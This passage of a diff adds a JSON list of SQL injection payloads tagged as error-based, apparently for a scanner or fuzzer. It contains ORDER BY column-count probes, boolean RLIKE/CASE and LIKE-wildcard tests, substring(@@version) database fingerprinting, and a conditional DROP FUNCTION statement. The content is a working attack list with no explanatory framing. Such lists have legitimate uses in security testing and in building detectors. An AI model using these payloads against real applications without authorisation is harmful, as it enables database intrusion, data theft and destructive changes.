"basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 25", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 26", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 27", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 28", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 29", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 30", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 31337", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "%' AND 8310=8310 AND '%'='", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "%' AND 8310=8311 AND '%'='", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,1,1))='X'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,1,1))='M'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,2,1))='i'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,2,1))='y'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,3,1))='c'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,3,1))='S'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "and (select substring(@@version,3,1))='X'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + } +] \ No newline at end of file